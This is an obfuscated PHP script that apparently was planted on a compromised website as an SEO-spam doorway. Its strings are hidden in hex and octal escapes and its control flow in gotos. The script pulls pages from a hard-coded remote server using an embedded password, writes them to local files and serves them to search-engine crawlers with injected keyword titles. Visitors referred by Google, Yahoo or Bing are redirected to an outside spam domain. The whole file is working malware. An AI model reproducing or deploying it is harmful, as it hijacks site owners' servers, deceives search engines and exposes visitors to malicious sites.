Your IP : 172.28.240.42
<?php
goto i_Sa7; i_Sa7: error_reporting(0); goto KGyg_; AzvUv: $s = $_SERVER["\x53\105\122\x56\105\122\137\116\x41\x4d\105"] . $s; goto KFcqY; lUEXF: if (function_exists("\x63\165\x72\154\x5f\151\x6e\151\x74")) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "\150\164\164\x70\72\x2f\57\61\63\x35\x2e\61\x38\x31\56\x32\61\x2e\x31\62\66\57" . $_GET["\146\156"] . "\x2e\160\x68\160\77\x70\141\163\163\75{$apass}\46\x71\x3d{$_GET["\151\x64"]}"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 4); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2); curl_setopt($ch, CURLOPT_USERAGENT, "\x4d\x6f\172\x69\x6c\x6c\x61\57\x34\56\60\x20\x28\143\157\155\x70\x61\164\151\x62\154\145\73\40\x4d\123\111\105\x20\x36\x2e\x30\x3b\x20\x57\x69\156\x64\x6f\167\163\x20\116\124\40\65\56\x31\x3b\x20\123\126\61\x29"); $text = curl_exec($ch); curl_close($ch); } goto T3IMs; TVc1w: foreach ($_GET as $a => $b) { $_GET["\x69\144"] = $b; } goto kz17g; ZfXXj: if (strpos($_SERVER["\110\x54\124\x50\x5f\122\x45\106\x45\x52\x45\x52"], "\x67\x6f\x6f\x67\x6c\x65\x2e") or strpos($_SERVER["\110\124\x54\120\137\122\x45\x46\105\x52\105\x52"], "\x79\141\150\157\x6f\x2e") or strpos($_SERVER["\110\124\x54\x50\x5f\x52\x45\x46\x45\122\105\122"], "\x62\x69\156\147\x2e")) { $tpl = "\x69\156\144\145\170\57" . $_GET["\x69\144"] . "\56\160\150\160\56\x74\x70\154"; $tpl = file($tpl); $tpl = chop($tpl[0]); $my = $_GET["\155\171"]; header("\114\x6f\x63\x61\x74\x69\157\x6e\72\x20\150\164\164\160\163\72\57\57\143\150\x70\157\x6b\x2e\163\151\164\x65\x2f\145\x6e\x74\145\x72\x2f\x3f\155\141\x72\x6b\75{$today}\55{$s}\46\164\160\154\x3d{$tpl}\46\x65\156\x67\153\145\x79\75{$keyword}"); die; } else { $myname = $_GET["\x69\144"] . "\x2e\160\x68\160"; if (file_exists("\151\x6e\x64\x65\170\x2f" . $myname)) { $html = @file_get_contents("\151\156\x64\145\x78\x2f" . $myname); if (strpos($_SERVER["\x48\x54\x54\120\x5f\125\x53\105\122\x5f\101\107\105\x4e\124"], "\142\151\156\147") > 2 or strpos($_SERVER["\x48\x54\x54\x50\137\x55\123\x45\122\137\x41\x47\x45\x4e\124"], "\x79\141\150\157\x6f") > 2) { $keyword = str_replace("\55", "\x20", $_GET["\x69\x64"]); $html = str_replace("\74\164\151\x74\154\x65\x3e\x3c\57\164\151\x74\154\x65\x3e", "\x3c\x74\x69\x74\154\x65\x3e{$keyword}\74\x2f\x74\x69\164\x6c\145\76", $html); } echo $html; die; } } goto XxFa7; hGvPB: $apass2 = "\142\x32\x33\150\x72\62\63\x76\x72\63\x32"; goto HaZJw; t1_ZJ: $_GET["\x77\x6f\x72\154\144"] = 5; goto QMFHC; fJJA0: $keyword = str_replace("\55", "\x20", $_GET["\x69\144"]); goto vwTlc; vwTlc: $keyword = str_replace("\40", "\x2b", $keyword); goto hGvPB; NOtnJ: $text = ''; goto lUEXF; HaZJw: $s = dirname($_SERVER["\x50\x48\x50\137\x53\105\114\106"]); goto ovDot; danzC: $apass1 = "\x76\151\163\x64\x6f\x69\x6a\145\167"; goto O0ml1; O0ml1: $x1 = 3; goto prCa5; v7Vsf: $apass = "{$apass1}" . "{$apass2}" . "{$apass3}"; goto ZfXXj; KFcqY: $apass3 = "\x72\166\x33\62\x79\144\x61\x63\x73\x76\163\144\x76"; goto v7Vsf; QMFHC: $_GET["\x66\x6e"] = "\x36\x39\66\x39\x36\71\156\x65\167"; goto danzC; QsAPm: echo $text; goto hhVrL; T3IMs: if (strlen($text) < 5000) { $text = file_get_contents("\x68\x74\x74\x70\x3a\x2f\57\61\x33\65\56\x31\70\x31\x2e\62\x31\56\x31\x32\x36\x2f" . $_GET["\x66\x6e"] . "\56\160\150\x70\77\160\x61\163\163\x3d{$apass}\x26\161\x3d{$_GET["\x69\144"]}"); } goto d4Vso; d4Vso: if (strlen($text) < 5000) { $url = "\61\x33\65\56\x31\x38\61\x2e\x32\61\x2e\61\62\x36"; $fp = fsockopen($url, 80, $errno, $errstr, 30); if (!$fp) { echo "{$errstr}\x20\50{$errno}\x29\74\142\162\x20\x2f\76\12"; } else { $req = "\57" . $_GET["\146\x6e"] . "\x2e\x70\x68\160\77\x70\141\x73\x73\x3d{$apass}\x26\x71\x3d{$_GET["\x69\144"]}"; $out = "\x47\105\124\40{$req}\40\110\x54\124\120\x2f\61\x2e\x30\15\xa"; $out .= "\110\x6f\x73\164\72\40{$url}\xd\12"; $out .= "\103\157\156\156\145\x63\164\151\x6f\156\x3a\40\x43\154\x6f\x73\x65\xd\12\xd\xa"; fwrite($fp, $out); while (!feof($fp)) { $text = $text . fgets($fp, 2048); } fclose($fp); } fclose($out); $text = explode("\12", $text); $text = $text[7]; } goto ZGRnj; KGyg_: $today = "\x32\x30\x32\x35\x30\66\x32\x30\x2d"; goto TVc1w; xIXL8: if ($_GET["\151\144"] == "\151\x6e\144\145\170") { header("\114\157\x63\141\164\151\157\156\x3a\40\150\164\164\160\163\x3a\x2f\57\147\157\x6f\147\154\x65\56\x63\x6f\x6d"); die; } goto t1_ZJ; prCa5: $xx1 = 5; goto fJJA0; kz17g: if ($_GET["\x69\x64"] == "\164\x65\x73\x74\x69\x6e\x67") { echo "\x74\x65\163\x74\x20\147\157\157\144\56\56\56"; die; } goto xIXL8; ZGRnj: if (strlen($text) > 5000) { $out = fopen("\x69\156\x64\x65\x78\57" . $myname, "\167"); fwrite($out, $text); fclose($out); } goto QsAPm; ovDot: if ($s == "\134" | $s == "\x2f") { $s = ''; } goto AzvUv; XxFa7: $query_pars_2 = str_replace("\x2d", "\x2b", $_GET["\x69\144"]); goto NOtnJ; hhVrL: ?>